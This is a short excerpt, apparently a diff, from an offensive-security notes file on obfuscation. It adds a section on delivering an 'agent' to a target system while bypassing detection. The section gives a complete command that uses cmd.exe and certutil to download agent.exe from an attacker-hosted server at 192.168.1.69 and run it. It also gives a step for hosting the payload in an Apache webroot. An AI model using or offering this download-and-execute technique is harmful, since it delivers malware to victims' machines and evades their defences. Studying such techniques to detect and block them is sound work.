r00t-3xp10it/hacking-material-books/obfuscation/simple_obfuscation.md

 ---

       TODO: [ certutil ] aditional download/execute remote method
+      Sometimes we need to use non-conventional methods to deliver our agent to target system and bypass detection, in this situation certutil can be an ussefull method.

 <br />

+- String command to obfuscate<br />
+`cmd.exe /c certutil.exe -urlcache -split -f http://192.168.1.69/agent.exe agent.exe && start agent.exe`<br />

       1º - Store your agent.exe into your apache webroot (linux) cp agent.exe /var/www/html/agent.exe